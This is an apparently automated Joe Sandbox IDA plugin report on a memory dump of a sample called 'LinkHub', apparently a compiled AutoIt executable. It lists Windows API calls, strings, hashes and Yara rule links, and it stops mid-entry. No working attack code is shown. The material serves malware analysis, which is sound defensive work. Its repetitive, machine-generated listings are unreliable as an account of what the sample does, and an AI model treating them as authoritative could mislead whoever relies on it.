Part of subcall function 00DD35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DD35E1
Part of subcall function 00DD35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DD3602
Part of subcall function 00DD35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DD3368,?), ref: 00DD3616
Part of subcall function 00DD35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00DD3368,?), ref: 00DD361F

Part of subcall function 00DD396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DD3A3C

Strings

AutoIt, xrefs: 00E13CA5
runas, xrefs: 00E13D75
0$, xrefs: 00DD3495
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E13CAA

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-3328958999
Opcode ID: bc4744bcf944402677685a517f20f46edb24810c0aa428c28edfa0d6c6fd13f5
Instruction ID: e489a6bf50730c5af1d2c0f76bcc0b28fd30e55e78d3c7cfca9d05bb6bb8aba6
Opcode Fuzzy Hash: bc4744bcf944402677685a517f20f46edb24810c0aa428c28edfa0d6c6fd13f5
Instruction Fuzzy Hash: EC51087020C341AECB01EF75AC01D6E7FA4DF9A744F40142EF59176262DB649A4DD772

Function 00E3DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E3DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00E3DDBA
Process32NextW.KERNEL32(00000000,?), ref: 00E3DDDA
CloseHandle.KERNELBASE(00000000), ref: 00E3DE87

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 26fd58b8de036a09dc4fcd200e98a2f5ad5cd8cce5c05aa3185ca678be0d556f
Instruction ID: 844c76c8b0ba01dff100d57f2729dad30a132780e061d3d680384e9fbec5a03c
Opcode Fuzzy Hash: 26fd58b8de036a09dc4fcd200e98a2f5ad5cd8cce5c05aa3185ca678be0d556f
Instruction Fuzzy Hash: CA319E315082009FC300EF61DC85AABBFE8EF99354F54092EF581962A1EB719949CBA2

Function 00DF5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00DF502E,00000003,00E998D8,0000000C,00DF5185,00000003,00000002,00000000,?,00E02C59,00000003), ref: 00DF5079
TerminateProcess.KERNEL32(00000000,?,00DF502E,00000003,00E998D8,0000000C,00DF5185,00000003,00000002,00000000,?,00E02C59,00000003), ref: 00DF5080
ExitProcess.KERNEL32 ref: 00DF5092

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3514fdb611b5589d17c037347ffacc4e912c9e1ace8fe2679f5c9bb1d1617b1e
Instruction ID: fd2d6838df547e7fd2a77a99a05707f53faa07e51293064610c02e5e742277a5
Opcode Fuzzy Hash: 3514fdb611b5589d17c037347ffacc4e912c9e1ace8fe2679f5c9bb1d1617b1e
Instruction Fuzzy Hash: 66E04631500508AFCF216F61ED08E693B69EB50382F468014FA09AA222DFB5DD42CAE0

Function 00DEAC3E Relevance: 33.9, APIs: 1, Strings: 18, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4, xrefs: 00DEAD45
(, xrefs: 00DEAD65
`, xrefs: 00DEADE2
d5m0, xrefs: 00DEAE75
(, xrefs: 00DEADC1
P, xrefs: 00DEAD3D
t, xrefs: 00DEAD35
@, xrefs: 00DEADED
d1b, xrefs: 00DEAD55, 00DEAE8E
`*, xrefs: 00DEAFF9
(, xrefs: 00DEAD4D
d0b, xrefs: 00DEAC96, 00DEAD10, 00DEAEA7
e#, xrefs: 00DEAFA9
(, xrefs: 00DEADD7
d10m0, xrefs: 00DEACF0
d1r0,2, xrefs: 00DEACA9
t, xrefs: 00DEADCC
i, xrefs: 00DEB0A3

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID: 4$@$P$`*$`$d0b$d10m0$d1b$d1r0,2$d5m0$e#$i$t$t$($($($(
API String ID: 0-2951036942
Opcode ID: a2dba615d4eb4f504d67da75dbb82cf44cfd8e3b937965e04e90d0ae2b7cf821
Instruction ID: 0ae9e5419c2c01a751e60e67bf8158f6850e836d465c89351b8546ada25c2650
Opcode Fuzzy Hash: a2dba615d4eb4f504d67da75dbb82cf44cfd8e3b937965e04e90d0ae2b7cf821
Instruction Fuzzy Hash: 4B628A706093818FC328DF15D585A9ABBE0FFC9358F00991EE489AB351DB71E945CFA2

Function 00DD370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00DD3709,?,?), ref: 00DD3777
KillTimer.USER32(?,00000001,?,?,?,?,?,00DD3709,?,?), ref: 00DD37A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DD37C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00DD3709,?,?), ref: 00DD37D1
CreatePopupMenu.USER32 ref: 00DD37E5
PostQuitMessage.USER32(00000000), ref: 00DD3806

Strings

0$, xrefs: 00E13DA9
TaskbarCreated, xrefs: 00DD37CC
0$, xrefs: 00E13DF7

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$$0$$TaskbarCreated
API String ID: 129472671-3836791346
Opcode ID: fa9751f8cbc7ec0384c24f60cc519ee6af0f113528969ed7713667e3ac7d17e1
Instruction ID: aaff3f6da4bf4f1f757c2f699182cf4c0bc30640a9f65ffa0d5669f02d2a5dcc
Opcode Fuzzy Hash: fa9751f8cbc7ec0384c24f60cc519ee6af0f113528969ed7713667e3ac7d17e1
Instruction Fuzzy Hash: BB41F5F1604645BFDB142B3D9C4DBBA3A65EB4A300F08412BF641B9390CAA4FF489673

Function 00DD3624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00DD3657
RegisterClassExW.USER32(00000030), ref: 00DD3681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DD3692
InitCommonControlsEx.COMCTL32(?), ref: 00DD36AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DD36BF
LoadIconW.USER32(000000A9), ref: 00DD36D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DD36E4

Strings

AutoIt v3 GUI, xrefs: 00DD3673
TaskbarCreated, xrefs: 00DD3687
+, xrefs: 00DD3640
0, xrefs: 00DD3639

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: eba21f07803418909cb5e65a6a8213f347d61190d69810459ca1b29699c89f77
Instruction ID: 1a07257d683d7d85b6b801db456c0ffa93bdf6397ce6a50d1bafbaaeff77ed25
Opcode Fuzzy Hash: eba21f07803418909cb5e65a6a8213f347d61190d69810459ca1b29699c89f77
Instruction Fuzzy Hash: F621E5B5E05308AFDB00DFAAEC89A9EBBB4FB0D750F00411AF611B62A0D7F555488F91

Function 00E109DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E1071A: CreateFileW.KERNELBASE(00000000,00000000,?,00E10A84,?,?,00000000,?,00E10A84,00000000,0000000C), ref: 00E10737

GetLastError.KERNEL32 ref: 00E10AEF
__dosmaperr.LIBCMT ref: 00E10AF6
GetFileType.KERNELBASE(00000000), ref: 00E10B02
GetLastError.KERNEL32 ref: 00E10B0C
__dosmaperr.LIBCMT ref: 00E10B15
CloseHandle.KERNEL32(00000000), ref: 00E10B35
CloseHandle.KERNEL32(?), ref: 00E10C7F
GetLastError.KERNEL32 ref: 00E10CB1
__dosmaperr.LIBCMT ref: 00E10CB8

Strings

H, xrefs: 00E10C3D

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: a6449cccf21d3293638851a704897474888d4dc13402259aba39eb4bee2748e3
Instruction ID: 7bf38b710a4fa291020bd9a908ab0e97762e8d733363563f97fe5654053b6187
Opcode Fuzzy Hash: a6449cccf21d3293638851a704897474888d4dc13402259aba39eb4bee2748e3
Instruction Fuzzy Hash: A6A10132A041588FDF19AF68D852BEE7BA0EF0A324F141159F811FB3D1DB719986CB61

Function 00DD52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DD5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E14B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00DD55B2

Part of subcall function 00DD5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DD525A

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DD53C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E14BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E14C3E
RegCloseKey.ADVAPI32(?), ref: 00E14C80
_wcslen.LIBCMT ref: 00E14CE7
_wcslen.LIBCMT ref: 00E14CF6

Strings

Software\AutoIt v3\AutoIt, xrefs: 00DD53BA
\Include\, xrefs: 00DD5381
\, xrefs: 00E14CFC
Include, xrefs: 00E14BF4, 00E14C35

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: f45c32b96de405b906f012a31306f51ebc0bc653ba9a463871036ddfef426d85
Instruction ID: f7fc6a76f03bf71b86c43bfe70229a66a92be3b546733736ac01244c081c3d66
Opcode Fuzzy Hash: f45c32b96de405b906f012a31306f51ebc0bc653ba9a463871036ddfef426d85
Instruction Fuzzy Hash: 7D7180715083059EC700EF66EC419ABBBE8FF99340F80542EF555A72A0DB71EA4CCBA1

Function 00DD34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00DD34DE
LoadCursorW.USER32(00000000,00007F00), ref: 00DD34ED
LoadIconW.USER32(00000063), ref: 00DD3503
LoadIconW.USER32(000000A4), ref: 00DD3515
LoadIconW.USER32(000000A2), ref: 00DD3527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DD353F
RegisterClassExW.USER32(?), ref: 00DD3590

Part of subcall function 00DD3624: GetSysColorBrush.USER32(0000000F), ref: 00DD3657
Part of subcall function 00DD3624: RegisterClassExW.USER32(00000030), ref: 00DD3681
Part of subcall function 00DD3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DD3692
Part of subcall function 00DD3624: InitCommonControlsEx.COMCTL32(?), ref: 00DD36AF
Part of subcall function 00DD3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DD36BF
Part of subcall function 00DD3624: LoadIconW.USER32(000000A9), ref: 00DD36D5
Part of subcall function 00DD3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DD36E4

Strings

AutoIt v3, xrefs: 00DD357F
#, xrefs: 00DD3566
0, xrefs: 00DD355F

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 9523c0320ce0edf116bfbed63cbc22cd517fa47605be2b1de8548d8df84eb3d9
Instruction ID: b62e41a0d8123fb6182f97ce259b249fc39057633ddefb46ab8de95d478da006
Opcode Fuzzy Hash: 9523c0320ce0edf116bfbed63cbc22cd517fa47605be2b1de8548d8df84eb3d9
Instruction Fuzzy Hash: 95211970E00355AFDB109FAAEC45A9A7BF4EB0E750F00001EE604B62A0D3B9654C8F90

Function 00DDF6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

t5, xrefs: 00DDF97E
Variable must be of type 'Object'., xrefs: 00E248C6
t5, xrefs: 00E2463C
t5, xrefs: 00E245E9
t5, xrefs: 00DDF8E0
t5, xrefs: 00DDFBB1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$t5$t5$t5$t5$t5
API String ID: 0-3061639177
Opcode ID: fc41fc13b332c2bc57b15e9b326a7784bd9d2d0df960326f472dd49ed38f2793
Instruction ID: 7b8c7e0ec58ec12cfe83aadf4100eb79356a057f5c9abc424c01fdfd34c0f42d
Opcode Fuzzy Hash: fc41fc13b332c2bc57b15e9b326a7784bd9d2d0df960326f472dd49ed38f2793
Instruction Fuzzy Hash: 87C27B75A00215DFCB24CFA8D880AADB7F1FF09314F29816AE956AB391D371ED45CB60

Function 00DD2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00DD2AF9
CoUninitialize.COMBASE ref: 00DD2B98
UnregisterHotKey.USER32(?), ref: 00DD2D7D
DestroyWindow.USER32(?), ref: 00E13A1B
FreeLibrary.KERNEL32(?), ref: 00E13A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E13AAD

Strings

close all, xrefs: 00DD2AF4

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 0624566b26ae5a71e3134a0c5ebc140382d5a6cf5db7e472e6ca60febb2b1f15
Instruction ID: e6d73109863cbdddac360554eaf33786d41181135f07603268318fa14a98b1d0
Opcode Fuzzy Hash: 0624566b26ae5a71e3134a0c5ebc140382d5a6cf5db7e472e6ca60febb2b1f15
Instruction Fuzzy Hash: 55D16B31705212CFCB29EF25C885A69F7A0EF14754F1152AEE54ABB362CB70AD52CF60

Function 00DD2793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DD327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DD32AF
Part of subcall function 00DD327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DD32B7
Part of subcall function 00DD327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DD32C2
Part of subcall function 00DD327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DD32CD
Part of subcall function 00DD327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DD32D5
Part of subcall function 00DD327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DD32DD

Part of subcall function 00DD3205: RegisterWindowMessageW.USER32(00000004,?,00DD2964), ref: 00DD325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DD2A0A
OleInitialize.OLE32 ref: 00DD2A28
CloseHandle.KERNELBASE(00000000,00000000), ref: 00E13A0D

Strings

0$, xrefs: 00DD2A2E
$, xrefs: 00DD280A
d(, xrefs: 00DD2964
(&, xrefs: 00DD2932
4', xrefs: 00DD2948

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&$0$$4'$d($$
API String ID: 1986988660-3144845333
Opcode ID: 3e71978f83b131a4fddf45152a09874607ef3bca00352fe9808e75bab20c71cf
Instruction ID: 2b04677cdf10d496e7666582bf0426bf1e794d700b213106512db9b727adbf84
Opcode Fuzzy Hash: 3e71978f83b131a4fddf45152a09874607ef3bca00352fe9808e75bab20c71cf
Instruction Fuzzy Hash: 8E71AEB0D052008F8788EF7FAC666153AE0FB9E344350912EE618FB361EB7465498F66

Function 00E090C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68a6112c58a49fbbc9d2d31e41edb05d640f1d692751e8c77f45323c107bed0
Instruction ID: c1cbf1b6ec2e2a0ae2105e177b6884d0c5ea91a852a07bc025330fb73e73ff3d
Opcode Fuzzy Hash: a68a6112c58a49fbbc9d2d31e41edb05d640f1d692751e8c77f45323c107bed0
Instruction Fuzzy Hash: 61C1E174A04249AFDF11DFA9D881BADBBB0AF1A304F045199E564BB3D3C7349982CF61

Function 00DD35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DD35E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DD3602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00DD3368,?), ref: 00DD3616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00DD3368,?), ref: 00DD361F

Strings

AutoIt v3, xrefs: 00DD35D9, 00DD35DE, 00DD35DF
edit, xrefs: 00DD35FC

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0dd1cfab46f0aaa177e005ca52a047001fc8ee2349be2983847c54c458648517
Instruction ID: f09bd4bef9ffb8e6b1af8da3ad331d7e715aba0367aa1ba13a652550808cdf9d
Opcode Fuzzy Hash: 0dd1cfab46f0aaa177e005ca52a047001fc8ee2349be2983847c54c458648517
Instruction Fuzzy Hash: 25F0D071A442957EEB31571B7C09E3B2E7DD7CBF50F00001EBA04B7160D5A5285DDA70

Function 00E41196 Relevance: 9.1, APIs: 6, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00E411B3
ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00E411EE
EnterCriticalSection.KERNEL32(?), ref: 00E4120A
LeaveCriticalSection.KERNEL32(?), ref: 00E41283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E4129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00E412C8

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

